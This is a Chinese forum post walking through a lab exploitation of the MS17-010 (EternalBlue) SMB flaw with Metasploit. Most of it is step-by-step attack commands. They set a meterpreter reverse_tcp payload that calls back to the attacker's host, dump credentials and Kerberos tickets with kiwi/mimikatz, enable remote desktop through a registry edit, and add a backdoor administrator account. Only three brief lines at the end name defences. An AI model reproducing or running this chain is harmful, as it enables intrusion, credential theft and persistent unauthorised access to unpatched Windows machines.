前进之路 发表于 2022-8-26 05:23:09

MS17-010永恒之蓝漏洞利用

MS17-010永恒之蓝漏洞利用

原理

永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。SMB服务在Windows与UNIX系列OS之间搭起一座桥梁,让两者的资源可互通有无。漏洞原理的深入研究,请参考:(https://blog.csdn.net/luoshenwei3533/article/details/82931999)
实验前准备

攻击ip:192.168.200.130
被攻击ip:192.168.200.101开启了445端口(默认是开启的),未打漏洞补丁,关闭防火墙
二者能够相互ping通步骤

1、启动MSF

msfconsole<br><img src="https://img2022.cnblogs.com/blog/2723702/202207/2723702-20220712214411625-511281646.png" alt="" loading="lazy">2、ms17_010模块使用过程

search ms17_010                              查找相应的漏洞模块

use exploit/windows/smb/ms17_010_psexec      加载模块

set RHOSTS 192.168.200.101                   设置攻击目标

check                                        进行检测,确认是否存在ms17_010漏洞

set payload windows/meterpreter/reverse_tcp加载payload

set LHOST 192.168.200.130                  设置本地IP

show options                                 查看模块相关参数

run                                          攻击(1)查找相应的漏洞模块
https://img2022.cnblogs.com/blog/2723702/202207/2723702-20220712214548590-1751330046.png
 (2)加载模块并设置目标
我们这里使用第1个,即”exploit/windows/smb/ms17_010_psexec“模块,并设置RHOSTS为被攻击IP
 https://img2022.cnblogs.com/blog/2723702/202207/2723702-20220712214935989-2002083086.png
使用check命令检测一下是否存在ms17_010漏洞。检测时,会自动加载auxiliary/scanner/smb/smb_ms17_010模块,可以看到,被攻击目标是存在这个漏洞的。
https://img2022.cnblogs.com/blog/2723702/202207/2723702-20220712215008831-1502802693.png
 (3)加载payload
这里使用windows/meterpreter/reverse_tcp作为攻击payload。
 https://img2022.cnblogs.com/blog/2723702/202207/2723702-20220712215135305-1576983851.png
攻击前,再用show options命令检查一下设置是否正确。
 https://img2022.cnblogs.com/blog/2723702/202207/2723702-20220712215242489-1932082456.png
(4)攻击
https://img2022.cnblogs.com/blog/2723702/202207/2723702-20220712215319476-1988417484.png
3、漏洞利用

(1) 查看系统信息 sysinfo
 https://img2022.cnblogs.com/blog/2723702/202207/2723702-20220712215405790-531900126.png
(2) 查看当前用户的权限 getuid
 https://img2022.cnblogs.com/blog/2723702/202207/2723702-20220712215447045-145094953.png
(3))获取目标系统权限 shell
 https://img2022.cnblogs.com/blog/2723702/202207/2723702-20220712215531577-1766468620.png
(4)获取目标主机用户以及密码,需要使用system权限,如果是在administrator下,直接使用 getsystem 即可
load kiwi加载kiwi模块
help kiwi查看kiwi模块帮助https://img2022.cnblogs.com/blog/2723702/202207/2723702-20220712215805673-180168475.png
 https://img2022.cnblogs.com/blog/2723702/202207/2723702-20220712215828192-361694940.png
creds_all 查看用户,密码,密码对应hash值等
 https://img2022.cnblogs.com/blog/2723702/202207/2723702-20220712220010850-1156781967.png
kiwi具体命令
load kiwi

creds_all:列举所有凭据
creds_kerberos:列举所有kerberos凭据
creds_msv:列举所有msv凭据
creds_ssp:列举所有ssp凭据
creds_tspkg:列举所有tspkg凭据
creds_wdigest:列举所有wdigest凭据
dcsync:通过DCSync检索用户帐户信息
dcsync_ntlm:通过DCSync检索用户帐户NTLM散列、SID和RID
golden_ticket_create:创建黄金票据
kerberos_ticket_list:列举kerberos票据
kerberos_ticket_purge:清除kerberos票据
kerberos_ticket_use:使用kerberos票据
kiwi_cmd:执行mimikatz的命令,后面接mimikatz.exe的命令
lsa_dump_sam:dump出lsa的SAM
lsa_dump_secrets:dump出lsa的密文
password_change:修改密码
wifi_list:列出当前用户的wifi配置文件
wifi_list_shared:列出共享wifi配置文件/编码(5)开启目标远程
开启目标远程,并创建一个test帐户
>>方法一
meterpreter > run post/windows/manage/enable_rdp username="test" password="123456"https://img2022.cnblogs.com/blog/2723702/202207/2723702-20220712220707448-668780018.png
  验证
https://img2022.cnblogs.com/blog/2723702/202207/2723702-20220712220804373-162344277.png
>>方法二
shell    <br>net user lfn 123456 /add                      创建用户
net localgroup administrators lfn /add    添加管理员权限      >>ps如果目标机器没有开启远程桌面服务,使用注册表进行打开
C:\Windows\system32>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f使用刚才创建的用户和密码进行远程,进行远程控制。
rdesktop 192.168.200.101 -u test -p 123456https://img2022.cnblogs.com/blog/2723702/202207/2723702-20220712221054698-257376963.png
防护措施


[*]关闭445等高危端口
[*]配置防火墙,安装防护软件
[*]安装补丁

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
页: [1]
查看完整版本: MS17-010永恒之蓝漏洞利用